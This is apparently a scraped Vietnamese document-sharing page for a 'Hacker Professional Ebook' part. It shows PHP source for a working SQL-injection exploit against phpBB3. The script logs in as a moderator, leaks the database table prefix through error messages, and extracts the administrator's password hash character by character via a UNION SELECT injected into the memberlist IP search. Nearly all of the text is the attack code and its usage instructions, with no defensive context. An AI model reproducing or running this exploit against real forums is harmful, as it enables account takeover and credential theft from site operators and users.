1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 409 pdf

12 43 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 12
Dung lượng 20,02 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

you need a global moderator account with "simple moderator" role */ if $argc.

Trang 1

you need a global moderator account with "simple moderator" role

*/

if ($argc<5) {

echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";

echo "host: target server (ip/hostname)\n";

echo "path: path to phpbb3\n";

echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n";

echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n";

echo " -P[ip:port]: specify a proxy\n";

echo " -u[number]: specify a user id other than 2 (admin)\n";

echo " -x: disclose table prefix through error messages\n";

echo "Example:\r\n";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die;

Trang 2

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" ";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}

Trang 3

}

return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy ';die;

Trang 4

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy ';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {

Trang 5

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix="PHPBB_";

$user_id="2";//admin

$discl=0;

$proxy="";

for ($i=3; $i<=$argc-1; $i++){

Trang 6

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]); }

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]); }

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]); }

if ($temp=="-u")

{

$user_id=str_replace("-u","",$argv[$i]); }

if ($temp=="-x")

Trang 7

{

$discl=1;

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);

$data.="&password=".urlencode($pass);

$data.="&redirect=index.php";

$data.="&login=Login";

$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";

$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Accept-Encoding: text/plain\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Connection: Close\r\n\r\n";

Trang 8

$packet.=$data;

sendpacketii($packet);

$cookie="";

$temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) {

$temp2=explode(" ",$temp[$i]);

$cookie.=" ".$temp2[0];

}

if (eregi("_u=1;",$cookie))

{

//echo $html."\n";//debug

//die("Unable to login ");

}

echo "cookie -> ".$cookie."\r\n";

if ($discl)

{

Trang 9

$sql="'suntzuuuuu";

echo "sql -> ".$sql."\n";

$sql=urlencode(strtoupper($sql));

$data="username=";

$data.="&icq=";

$data.="&email=";

$data.="&aim=";

$data.="&joined_select=lt";

$data.="&joined=";

$data.="&yahoo=";

$data.="&active_select=lt";

$data.="&active=";

$data.="&msn=";

$data.="&count_select=eq";

$data.="&count=";

$data.="&jabber=";

$data.="&sk=c";

$data.="&sd=a";

Trang 10

$data.="&ip=".$sql;

$data.="&search_group_id=0";

$data.="&submit=Search";

$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&s

k=c&sd=a&ip=%5C%27&form=post&field=username_list&m

ode=searchuser&form=po

st HTTP/1.0\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Connection: Close\r\n";

$packet.="Cookie: ".$cookie." \r\n\r\n";

$packet.=$data;

sendpacketii($packet);

if (strstr($html,"You have an error in your SQL syntax"))

{

$temp=explode("posts",$html);

$temp2=explode(" ",$temp[0]);

Trang 11

$prefix=strtoupper($temp2[count($temp2)-1]);

echo "prefix -> ".$prefix."\n";sleep(2);

}

}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$sql="1.1.1.999') UNION SELECT IF

((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM

".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";

Trang 12

echo "sql -> ".$sql."\n";

$sql=urlencode(strtoupper($sql));

$data="username=";

$data.="&icq=";

$data.="&email=";

$data.="&aim=";

$data.="&joined_select=lt";

$data.="&joined=";

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN